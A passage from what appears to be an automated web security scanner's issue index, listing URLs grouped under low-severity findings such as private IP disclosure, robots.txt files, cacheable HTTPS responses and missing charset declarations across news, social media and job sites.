27.99. http://www.townnews.com/multimedia_solutions/

27.100. http://www.townnews.com/multimedia_solutions/enhanced_video/

27.101. http://www.townnews.com/multimedia_solutions/photo_gallery/

27.102. http://www.townnews.com/multimedia_solutions/standard_video/

27.103. http://www.townnews.com/search/

27.104. http://www.townnews.com/shared-content/perform/

27.105. http://www.townnews.com/shopping_solutions/

27.106. http://www.townnews.com/shopping_solutions/yellow_pages/

27.107. http://www.townnews.com/shopping_solutions/yp_top_ads/

27.108. http://www.townnews.com/site/about/

27.109. http://www.townnews.com/site/affiliates/

27.110. http://www.townnews.com/site/careers/

27.111. http://www.townnews.com/site/careers/article_1f9ad1d8-9fcf-11df-9247-001cc4c03286.html

27.112. http://www.townnews.com/site/careers/article_292d5bac-90e4-11df-9249-001cc4c03286.html

27.113. http://www.townnews.com/site/contact/

27.114. http://www.townnews.com/site/customers/

27.115. http://www.townnews.com/site/forms/

27.116. http://www.townnews.com/site/sales_team/

27.117. http://www.townnews.com/site/site_index/

27.118. http://www.townnews.com/site/site_launches/article_59ec092c-7d7a-11e0-a745-001cc4c002e0.html

27.119. http://www.townnews.com/site/site_launches/article_dedd058e-6ac2-11e0-a2ee-001cc4c03286.html

27.120. http://www.townnews.com/site/site_submissions/

27.121. http://www.townnews.com/site/speakers_bureau/

27.122. http://www.townnews.com/site/swat_team/

27.123. http://www.townnews.com/submissions/

27.124. http://www.townnews.com/topic/

27.125. http://www.townnews.com/user-generated_solutions/

27.126. http://www.townnews.com/user-generated_solutions/calendar/

27.127. http://www.townnews.com/user-generated_solutions/enhanced_video/

27.128. http://www.townnews.com/user-generated_solutions/user_account_contributions/

27.129. http://www.townnews.com/users/admin/calendar/event/

27.130. http://www.townnews365.com/content/tncms/live/

27.131. http://www.townnews365.com/content_management_solutions/

27.132. http://www.townnews365.com/content_management_solutions/about_blox/

27.133. http://www.townnews365.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html

27.134. http://www.townnews365.com/content_management_solutions/calendar/

27.135. http://www.townnews365.com/content_management_solutions/calendar/image_9cb4a620-4418-11df-941f-001cc4c002e0.html

27.136. http://www.townnews365.com/content_management_solutions/image_63500bb8-441d-11df-b714-001cc4c002e0.html

27.137. http://www.townnews365.com/content_management_solutions/murlinstats/

27.138. http://www.townnews365.com/content_management_solutions/murlinstats/image_69db35d0-4741-11df-ac75-001cc4c002e0.html

27.139. http://www.townnews365.com/content_management_solutions/news/

27.140. http://www.townnews365.com/content_management_solutions/polls/

27.141. http://www.townnews365.com/content_management_solutions/topic_page/

27.142. http://www.townnews365.com/content_management_solutions/user_services/

27.143. http://www.townnews365.com/distribution_solutions/rss_feeds/

27.144. http://www.townnews365.com/e-mail_blast/features/subscribe/

27.145. http://www.townnews365.com/e-mail_blast/software_updates/subscribe/

27.146. http://www.townnews365.com/search/

27.147. http://www.townnews365.com/search/results/

27.148. http://www.townnews365.com/site/customers/

27.149. http://www.townnews365.com/site/forms/

27.150. http://www.townnews365.com/site/sales_team/

27.151. http://www.townnews365.com/site/swat_team/

27.152. http://www.townnews365.com/submissions/

27.153. http://www.townnews365.com/topic/

27.154. http://www.townnews365.com/user-generated_solutions/user_account_contributions/

27.155. http://www.townnews365.com/users/forgot/

27.156. http://www.townnews365.com/users/login/

27.157. http://www.townnews365.com/users/manage/

27.158. http://www.unitedbank-dcmetro.com/external.asp

27.159. http://www.unitedbank-dcmetro.com/index.asp

27.160. http://www.vccedge.com/sites/all/themes/vccircle/layout.css

27.161. http://www.vccedge.com/sites/all/themes/vccircle/style.css

27.162. http://www.zoosk.com/d/dating2/35/

28. Private IP addresses disclosed

28.1. http://api.facebook.com/restserver.php

28.2. http://connect.facebook.net/en_US/all.js

28.3. http://connect.facebook.net/en_US/all.js

28.4. http://connect.facebook.net/en_US/all.js

28.5. http://external.ak.fbcdn.net/safe_image.php

28.6. http://facebook.com/images/fb_logo_small.jpg

28.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.8. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.9. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.10. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.11. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.12. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.13. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.14. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.15. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.16. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.17. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.18. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.19. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.20. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.21. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.22. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.23. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.24. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.25. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.26. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.27. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.28. http://platform.ak.fbcdn.net/www/app_full_proxy.php

28.29. http://static.99labels.com/UploadedFiles/SpacialBrandImages/brand-page-art-apparels.jpg

28.30. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/coming-soon-cheap-sex.jpg

28.31. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/coming-soon-cheepsex1234.jpg

28.32. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/coming-soon-converse.jpg

28.33. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/coming-soon-crystalwear.jpg

28.34. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/coming-soon-horro.jpg

28.35. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/coming-soon-terra.jpg

28.36. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/ethnique-coming-soon.jpg

28.37. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/fragrances-for-women-coming-soondfdwomenIV.jpg

28.38. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/fragshakunII.jpg

28.39. http://static.99labels.com/UploadedFiles/SpecialBGUpComingImages/unlike-coming-soon.jpg

28.40. http://static.ak.connect.facebook.com/connect.php/en_US

28.41. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

28.42. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

28.43. http://static.ak.fbcdn.net/connect.php/css/share-button-css

28.44. http://static.ak.fbcdn.net/connect.php/js/FB.Share

28.45. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.46. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.47. http://static.ak.fbcdn.net/images/connect_sprite.png

28.48. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css

28.49. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eF18io80rwD.css

28.50. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/yhXvg7ip9xz.js

28.51. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/PmVxJRjHUoq.css

28.52. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/w8K2nfDzJmR.css

28.53. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/aGp-oDuyhls.css

28.54. http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/GaQUVuWoV-Y.css

28.55. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css

28.56. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css

28.57. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css

28.58. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/Li1LKKUk-mH.css

28.59. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/L7l1tNBIWfq.css

28.60. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/xAQcvChAX0K.css

28.61. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/xrEeXUiCo9E.js

28.62. http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/pCTO1U6GssV.css

28.63. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/xa3uF2Ww2Pl.css

28.64. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css

28.65. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/HW3biqLGeY2.css

28.66. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css

28.67. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css

28.68. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/rSNmwHZmlsw.css

28.69. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/mQfKSx58T29.css

28.70. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css

28.71. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/snpqNPEQfJF.css

28.72. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/1thKbSBDn8S.css

28.73. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js

28.74. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/MZYBPjpMjzj.css

28.75. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/SHKAQsmeQ8Q.js

28.76. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vGrfOJHPJkR.css

28.77. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OU0y6L3A4iM.js

28.78. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/wh8617U5Ly3.css

28.79. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/p8LRMhtFG4g.css

28.80. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/nfbcyOQNzob.js

28.81. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js

28.82. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/NsFFrVYzya-.css

28.83. http://static.ak.fbcdn.net/rsrc.php/v1/z2/r/lQnr2lay0rR.png

28.84. http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png

28.85. http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/Yz_2RL5XOEG.png

28.86. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/UvyvLtJTQzO.png

28.87. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/sVrwJtmBVjI.gif

28.88. http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png

28.89. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/Y2hvkMjCrcT.png

28.90. http://static.ak.fbcdn.net/rsrc.php/v1/zH/r/eIpbnVKI9lR.png

28.91. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png

28.92. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

28.93. http://static.ak.fbcdn.net/rsrc.php/v1/zd/r/Cou7n-nqK52.gif

28.94. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png

28.95. http://www.99labels.com/favicon.ico

28.96. http://www.99labels.com/images/loading.gif

28.97. http://www.99labels.com/v1/images/99-labels.png

28.98. http://www.99labels.com/v1/images/99-labelsIndex.png

28.99. http://www.99labels.com/v1/images/add-cart-left.png

28.100. http://www.99labels.com/v1/images/add-cart-right.png

28.101. http://www.99labels.com/v1/images/ajax-loader99.gif

28.102. http://www.99labels.com/v1/images/arrowforward.png

28.103. http://www.99labels.com/v1/images/arrowright.png

28.104. http://www.99labels.com/v1/images/banner-black.png

28.105. http://www.99labels.com/v1/images/banner-grey.png

28.106. http://www.99labels.com/v1/images/bc-top.gif

28.107. http://www.99labels.com/v1/images/become-bg.png

28.108. http://www.99labels.com/v1/images/bg-index.jpg

28.109. http://www.99labels.com/v1/images/bg.jpg

28.110. http://www.99labels.com/v1/images/bkg_close.gif

28.111. http://www.99labels.com/v1/images/blog-bottum.png

28.112. http://www.99labels.com/v1/images/blog-repeat.png

28.113. http://www.99labels.com/v1/images/blog-top.png

28.114. http://www.99labels.com/v1/images/bottum-top.png

28.115. http://www.99labels.com/v1/images/cartoon1.png

28.116. http://www.99labels.com/v1/images/close_grey.png

28.117. http://www.99labels.com/v1/images/dashed-sep.gif

28.118. http://www.99labels.com/v1/images/date-bg.png

28.119. http://www.99labels.com/v1/images/facebook.png

28.120. http://www.99labels.com/v1/images/fb-small.png

28.121. http://www.99labels.com/v1/images/go.png

28.122. http://www.99labels.com/v1/images/gr-left.png

28.123. http://www.99labels.com/v1/images/gr-right.png

28.124. http://www.99labels.com/v1/images/grey-left.png

28.125. http://www.99labels.com/v1/images/grey-right.png

28.126. http://www.99labels.com/v1/images/index-login-field-bg.gif

28.127. http://www.99labels.com/v1/images/index-repeat.png

28.128. http://www.99labels.com/v1/images/indexbottom.png

28.129. http://www.99labels.com/v1/images/indextop-new.png

28.130. http://www.99labels.com/v1/images/join-now-button.png

28.131. http://www.99labels.com/v1/images/know-more.png

28.132. http://www.99labels.com/v1/images/loading.gif

28.133. http://www.99labels.com/v1/images/login-field-bg.png

28.134. http://www.99labels.com/v1/images/login.png

28.135. http://www.99labels.com/v1/images/logo-bg.gif

28.136. http://www.99labels.com/v1/images/new_back.jpg

28.137. http://www.99labels.com/v1/images/registration_back.png

28.138. http://www.99labels.com/v1/images/request1.png

28.139. http://www.99labels.com/v1/images/sep-bottom.png

28.140. http://www.99labels.com/v1/images/sign-in.png

28.141. http://www.99labels.com/v1/images/small-social-bg-right.gif

28.142. http://www.99labels.com/v1/images/small-social-bg.gif

28.143. http://www.99labels.com/v1/images/strip-off-bg.png

28.144. http://www.99labels.com/v1/images/submit_button.png

28.145. http://www.99labels.com/v1/images/tableft.png

28.146. http://www.99labels.com/v1/images/tabright.png

28.147. http://www.99labels.com/v1/images/top-right-nav-sep.png

28.148. http://www.99labels.com/v1/images/twitter-small.png

28.149. http://www.99labels.com/v1/images/twitter.png

28.150. http://www.99labels.com/v1/images/view-more.png

28.151. http://www.99labels.com/v1/images/visacode.png

28.152. http://www.facebook.com/ajax/connect/connect_widget.php

28.153. http://www.facebook.com/apps/application.php

28.154. http://www.facebook.com/campaign/landing.php

28.155. http://www.facebook.com/extern/login_status.php

28.156. http://www.facebook.com/extern/login_status.php

28.157. http://www.facebook.com/extern/login_status.php

28.158. http://www.facebook.com/extern/login_status.php

28.159. http://www.facebook.com/favicon.ico

28.160. http://www.facebook.com/favicon.ico

28.161. http://www.facebook.com/home.php

28.162. http://www.facebook.com/images/loaders/indicator_black.gif

28.163. http://www.facebook.com/pages/Moline-IL/TownNewscom/98681439791

28.164. http://www.facebook.com/plugins/like.php

28.165. http://www.facebook.com/plugins/like.php

28.166. http://www.facebook.com/plugins/like.php

28.167. http://www.facebook.com/plugins/like.php

28.168. http://www.facebook.com/plugins/like.php

28.169. http://www.facebook.com/plugins/like.php

28.170. http://www.facebook.com/plugins/like.php

28.171. http://www.facebook.com/plugins/like.php

28.172. http://www.facebook.com/plugins/like.php

28.173. http://www.facebook.com/plugins/like.php

28.174. http://www.facebook.com/plugins/like.php

28.175. http://www.facebook.com/plugins/like.php

28.176. http://www.facebook.com/plugins/like.php

28.177. http://www.facebook.com/plugins/like.php

28.178. http://www.facebook.com/plugins/likebox.php

28.179. http://www.facebook.com/plugins/likebox.php

28.180. http://www.facebook.com/profile.php

28.181. http://www.facebook.com/r.php

28.182. http://www.facebook.com/recover.php

28.183. http://www.facebook.com/register/fbconnect.php

28.184. http://www.facebook.com/zooskdating

28.185. https://www.facebook.com/favicon.ico

28.186. https://www.facebook.com/login.php

28.187. https://www.facebook.com/recover.php

29. Credit card numbers disclosed

30. Robots.txt file

30.1. http://198.64.153.138/dhavenues/

30.2. http://99labels.com/v1/Index.aspx

30.3. http://ad.doubleclick.net/getcamphist

30.4. http://adserv.vccircle.com/www/delivery/ajs.php

30.5. http://altfarm.mediaplex.com/ad/fm/10599-62036-39186-0

30.6. http://api.facebook.com/restserver.php

30.7. http://api.twitter.com/receiver.html

30.8. http://apply.naukri.com/Apply/service/mn_ApplyServiceOne.php

30.9. http://ask.policybazaar.com/

30.10. http://at.amgdgt.com/ads/

30.11. http://b.scorecardresearch.com/b

30.12. http://blogs.vccircle.com/

30.13. http://bloxcms.com/

30.14. http://brothercake.com/site/resources/scripts/onload/

30.15. http://c7.zedo.com/img/bh.gif

30.16. http://careers.accenture.com/in-en/landing-pages/Pages/careers-at-accenture10.aspx

30.17. http://cm.g.doubleclick.net/pixel

30.18. http://code.google.com/p/swfobject/

30.19. http://corp.naukri.com/mynaukri/mn_newsmartsearch.php

30.20. http://creativecommons.org/licenses/LGPL/2.1/

30.21. http://d7.zedo.com/bar/v16-406/d8/jsc/gl.js

30.22. http://d8.zedo.com/jsc/d8/ff2.html

30.23. http://dealcurry.com/20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm

30.24. http://dis.criteo.com/dis/rtb/google/cookiematch.aspx

30.25. http://dis.us.criteo.com/dis/dis.aspx

30.26. http://docs.townnews.com/favicon.ico

30.27. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

30.28. http://feeds.bbci.co.uk/news/rss.xml

30.29. http://fls.doubleclick.net/activityi

30.30. https://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

30.31. http://go.microsoft.com/fwlink/

30.32. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1056982488/

30.33. https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1037957961/

30.34. http://hosted.newsgator.com/NGBuzz/attn.ashx

30.35. http://images.zwire.com/ypenhadv.cfm

30.36. http://img-cdn.mediaplex.com/0/5712/universal.html

30.37. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

30.38. http://img.yatra.com/yatra_blue-theme/images/common/newHomePageSpritsImg.gif

30.39. http://jobsearch.naukri.com/mynaukri/sap_ajaxparse.php

30.40. http://knowledge.policybazaar.com/templates/templ/favicon.ico

30.41. http://l.addthiscdn.com/live/t00/250lo.gif

30.42. http://login.naukri.com/nLogin/Login.php

30.43. https://login.naukri.com/nLogin/Login.php

30.44. http://m8.zedo.com/log/p.gif

30.45. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

30.46. http://media2.legacy.com/bind

30.47. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s86852463499098

30.48. http://my.naukri.com/manager/createacc2.php

30.49. http://new-static.yatra.com/livehelp/include/status.php

30.50. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

30.51. http://nmp.newsgator.com/NGBuzz/Buzz.ashx

30.52. http://omni.accenture.com/b/ss/accactcarprod,accactglobprod/1/H.21/s88637515602167

30.53. http://pagead2.googlesyndication.com/pagead/imgad

30.54. http://phx.corporate-ir.net/phoenix.zhtml

30.55. http://r1.zedo.com/log/ERR.gif

30.56. http://s7.addthis.com/js/250/addthis_widget.js

30.57. http://safebrowsing.clients.google.com/safebrowsing/downloads

30.58. http://search.twitter.com/search.json

30.59. http://segment-pixel.invitemedia.com/pixel

30.60. http://services.google.com/feedback/abg

30.61. http://srv.clickfuse.com/pixels/create.php

30.62. http://st-www2.stowetoday.com/calendar_box

30.63. http://static.ak.fbcdn.net/connect/xd_proxy.php

30.64. http://static01.linkedin.com/scds/concat/common/css

30.65. http://static02.linkedin.com/scds/concat/common/js

30.66. http://support.townnews.com/webinars

30.67. http://tag.admeld.com/match

30.68. http://techcircle.vccircle.com/500/policybazaar-com-raises-rs-10-crore-from-info-edge-to-close-rs-30-crore-from-intel-capital-shortly/

30.69. http://toolbarqueries.clients.google.com/tbproxy/af/query

30.70. http://townnews.com/favicon.ico

30.71. https://townnews365-dot-com.bloxcms.com/users/login/

30.72. https://tt3.zedo.com/jsc/tt3/ff2.html

30.73. http://twitter.com/share

30.74. http://us.blackberry.com/apps-software/appworld/

30.75. http://us.yatra.com/livehelp/include/status.php

30.76. http://w5.naukri.com/resbilling/main/rservices.php

30.77. http://www.99labels.com/v1/index.aspx

30.78. http://www.addthis.com/bookmark.php

30.79. http://www.adobe.com/cfusion/knowledgebase/index.cfm

30.80. http://www.blackberry.com/appworld/

30.81. http://www.classesandcareers.com/schooldegrees/fusion.php

30.82. http://www.facebook.com/plugins/like.php

30.83. https://www.facebook.com/recover.php

30.84. http://www.google-analytics.com/__utm.gif

30.85. http://www.google.com/aclk

30.86. https://www.google.com/adsense/support/bin/request.py

30.87. http://www.googleadservices.com/pagead/conversion/1056982488/

30.88. http://www.linkedin.com/company/sapientnitro

30.89. http://www.markosweb.com/www/policybazaar.com/

30.90. http://www.mediaplex.com/

30.91. http://www.naukri.com/

30.92. http://www.policybazaar.com/ScriptResource.axd

30.93. http://www.quarles.com/include_common/NetInsight/ntpagetag.gif

30.94. http://www.quora.com/

30.95. http://www.sapient.com/stolen/static/

30.96. http://www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html

30.97. http://www.townnews.com/favicon.ico

30.98. http://www.townnews365.com/content_management_solutions/about_blox/

30.99. http://www.vccedge.com/files/vccircle_favicon.ico

30.100. http://www.vccircle.com/500/news/DWConfiguration/ActiveContent/IncludeFiles/AC_RunActiveContent.js

30.101. http://www.yatra.com/connect/www/content/afr.php

30.102. http://www.zoosk.com/d/dating2/35/

30.103. http://yads.zedo.com/ads2/c

30.104. http://yatra.122.2o7.net/b/ss/yatradomobjavaprod/1/H.17/s05612946357578

31. Cacheable HTTPS response

31.1. https://adsafecontrol.com/images/favicon.ico

31.2. https://adsafecontrol.com/login

31.3. https://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

31.4. https://login.naukri.com/nLogin/Login.php

31.5. https://tas-cognizant.taleo.net/careersection/indapac_itbpo_ext_career/jobdetail.ftl

31.6. https://tas-cognizant.taleo.net/careersection/indapac_itbpo_ext_career/moresearch.ftl

31.7. https://tt3.zedo.com/jsc/tt3/ff2.html

31.8. https://www.google.com/adsense/support/bin/request.py

32. Multiple content types specified

33. HTML does not specify charset

33.1. http://198.64.153.138/dhavenues/

33.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.121

33.3. http://adsys.townnews.com/creative/www.stowetoday.com/liner_ads/static.js

33.4. http://adsys.townnews.com/creative/www.stowetoday.com/special_offers/static.js

33.5. http://adsys.townnews.com/creative/www.stowetoday.com/top_homes/static.js

33.6. http://appworld.blackberry.com/

33.7. http://buglight.org/Images/community_over.jpg

33.8. http://buglight.org/Images/contact_over.jpg

33.9. http://buglight.org/Images/images/header_bg.jpg

33.10. http://buglight.org/Images/links_over.jpg

33.11. http://buglight.org/Images/main_over.jpg

33.12. http://buglight.org/Images/weddings_over.jpg

33.13. http://buglight.org/Images/who_over.jpg

33.14. http://buglight.org/favicon.ico

33.15. http://buyonline.aegonreligare.com/buyonline/default.htm

33.16. http://d8.zedo.com/ads3/i/

33.17. http://d8.zedo.com/jsc/d8/ff2.html

33.18. http://fls.doubleclick.net/activityi

33.19. http://images.zwire.com/ypenhadv.cfm

33.20. http://jobsearch.naukri.com/mynaukri/google/googleadsx_2.php

33.21. http://jobsearch.naukri.com/mynaukri/js_searchPlug.php

33.22. http://jobsearch.naukri.com/mynaukri/newsuggest2.php

33.23. http://jobsearch.naukri.com/mynaukri/sap_ajaxparse.php

33.24. http://js.adsonar.com/js/pass.html

33.25. http://knowledge.policybazaar.com/index2.php

33.26. http://login.naukri.com/nLogin/Login.php

33.27. https://login.naukri.com/nLogin/Login.php

33.28. http://my.naukri.com/manager/rm_uploadCV.php

33.29. http://static.naukimg.com/fc_images/30.gif

33.30. http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html

33.31. http://stats.townnews.com/docs.townnews.com,%20docs.townnews.com/

33.32. http://stats.townnews.com/st-www2.stowetoday.com/

33.33. http://stats.townnews.com/stowetoday.com/

33.34. http://stats.townnews.com/support.townnews.com/

33.35. http://stats.townnews.com/townnews.com/

33.36. http://stats.townnews.com/townnews365.com/

33.37. https://tt3.zedo.com/jsc/tt3/ff2.html

33.38. http://w10.naukri.com/gpw/acs/images/spacer.gif

33.39. http://www.99labels.com/v1/xd_receiver.htm

33.40. http://www.naukri.com/mailers/tcs/form.php

33.41. http://www.naukri.com/tieups/tieups.php

33.42. http://www.townnews.com/affiliates/

33.43. http://www.townnews.com/archives/

33.44. http://www.townnews.com/art/e-mail_blast/linkedin.png/

33.45. http://www.townnews.com/art/e-mail_blast/twitter.png/

33.46. http://www.townnews.com/classified_solutions/ad-owl/

33.47. http://www.townnews.com/classified_solutions/automotive_solutions/

33.48. http://www.townnews.com/company/

33.49. http://www.townnews.com/contact_us/

33.50. http://www.townnews.com/customers/

33.51. http://www.townnews.com/edition/demo/

33.52. http://www.townnews.com/global/resources/images/icon-03.gif

33.53. http://www.townnews.com/global/resources/images/icon-04.gif

33.54. http://www.townnews.com/global/resources/images/icon-05.gif

33.55. http://www.townnews.com/global/resources/styles/print.css

33.56. http://www.townnews.com/job_opportunities/

33.57. http://www.townnews.com/news/

33.58. http://www.townnews.com/shared-content/e-edition/display.php

33.59. http://www.townnews.com/shared-content/e-edition/fullscreen.html

33.60. http://www.townnews.com/shared-content/e-edition/loading.html

33.61. http://www.townnews.com/shared-content/e-edition/menu.php

33.62. http://www.townnews.com/shared-content/e-edition/search.php

33.63. http://www.townnews.com/shared-content/e-edition/showdate.php

33.64. http://www.townnews.com/shared-content/perform/

33.65. http://www.townnews.com/shared-content/swfobject/swfobject.js

33.66. http://www.townnews.com/shared-content/tncms-ad-manager/ads.js

33.67. http://www.townnews.com/swat_team/

33.68. http://www.townnews.com/the_job_network/

33.69. http://www.townnews365.com/

33.70. http://www.townnews365.com/advertising_solutions/ad_creation/

33.71. http://www.townnews365.com/advertising_solutions/banner_ads/

33.72. http://www.townnews365.com/advertising_solutions/business_directory/

33.73. http://www.townnews365.com/advertising_solutions/dotconnect_media

33.74. http://www.townnews365.com/advertising_solutions/swat

33.75. http://www.townnews365.com/advertising_solutions/swat/

33.76. http://www.townnews365.com/advertising_solutions/top_ads/

33.77. http://www.townnews365.com/advertising_solutions/yellow_pages/

33.78. http://www.townnews365.com/advertising_solutions/yp_top_ads/

33.79. http://www.townnews365.com/advertising_solutions/yp_top_ads/demonstration/

33.80. http://www.townnews365.com/app/images/puzzle-front.jpg

33.81. http://www.townnews365.com/classified_solutions/

33.82. http://www.townnews365.com/classified_solutions/ad-market

33.83. http://www.townnews365.com/classified_solutions/ad-market/

33.84. http://www.townnews365.com/classified_solutions/ad-market/demonstration/

33.85. http://www.townnews365.com/classified_solutions/ad-owl

33.86. http://www.townnews365.com/classified_solutions/ad-owl/

33.87. http://www.townnews365.com/classified_solutions/ad-owl/demonstration

33.88. http://www.townnews365.com/classified_solutions/automotive_solutions/

33.89. http://www.townnews365.com/classified_solutions/automotive_solutions/top_cars/

33.90. http://www.townnews365.com/classified_solutions/automotive_solutions/top_cars/demonstration/

33.91. http://www.townnews365.com/classified_solutions/automotive_solutions/transportation_classifieds/

33.92. http://www.townnews365.com/classified_solutions/automotive_solutions/transportation_classifieds/demonstration

33.93. http://www.townnews365.com/classified_solutions/automotive_solutions/wheels/demonstration/

33.94. http://www.townnews365.com/classified_solutions/employment_solutions/

33.95. http://www.townnews365.com/classified_solutions/employment_solutions/employment_classifieds/

33.96. http://www.townnews365.com/classified_solutions/employment_solutions/employment_classifieds/demonstration/

33.97. http://www.townnews365.com/classified_solutions/employment_solutions/the_job_network/demonstration/

33.98. http://www.townnews365.com/classified_solutions/employment_solutions/top_jobs/demonstration

33.99. http://www.townnews365.com/classified_solutions/pdf_display_ad_converter/

33.100. http://www.townnews365.com/classified_solutions/real_estate_solutions/real_estate_classifieds/

33.101. http://www.townnews365.com/classified_solutions/real_estate_solutions/real_estate_classifieds/demonstration/

33.102. http://www.townnews365.com/classified_solutions/real_estate_solutions/top_homes/

33.103. http://www.townnews365.com/classified_solutions/real_estate_solutions/top_homes/demonstration/

33.104. http://www.townnews365.com/classified_solutions/top_ads

33.105. http://www.townnews365.com/classified_solutions/top_ads/

33.106. http://www.townnews365.com/classified_solutions/top_ads/demonstration/

33.107. http://www.townnews365.com/content/tncms/avatars/6/c9/4bd/6c94bd0e-d884-11de-85c7-001a4bcf887a.png

33.108. http://www.townnews365.com/content_management_solutions

33.109. http://www.townnews365.com/content_management_solutions/about_blox/editorial/editorial-core-base/resources/images/user_70.png

33.110. http://www.townnews365.com/content_management_solutions/about_blox/global/resources/styles/print.css

33.111. http://www.townnews365.com/content_management_solutions/blogs/

33.112. http://www.townnews365.com/content_management_solutions/calendar/editorial/editorial-core-base/resources/images/user_70.png

33.113. http://www.townnews365.com/content_management_solutions/calendar/global/resources/styles/print.css

33.114. http://www.townnews365.com/content_management_solutions/murlinstats/editorial/editorial-core-base/resources/images/user_70.png

33.115. http://www.townnews365.com/content_management_solutions/murlinstats/global/resources/styles/print.css

33.116. http://www.townnews365.com/content_solutions

33.117. http://www.townnews365.com/content_solutions/

33.118. http://www.townnews365.com/content_solutions/financial_news/

33.119. http://www.townnews365.com/content_solutions/stock_ticker/

33.120. http://www.townnews365.com/content_solutions/weather/

33.121. http://www.townnews365.com/creatives_solutions/

33.122. http://www.townnews365.com/creatives_solutions/ad_creation/

33.123. http://www.townnews365.com/creatives_solutions/circulars/
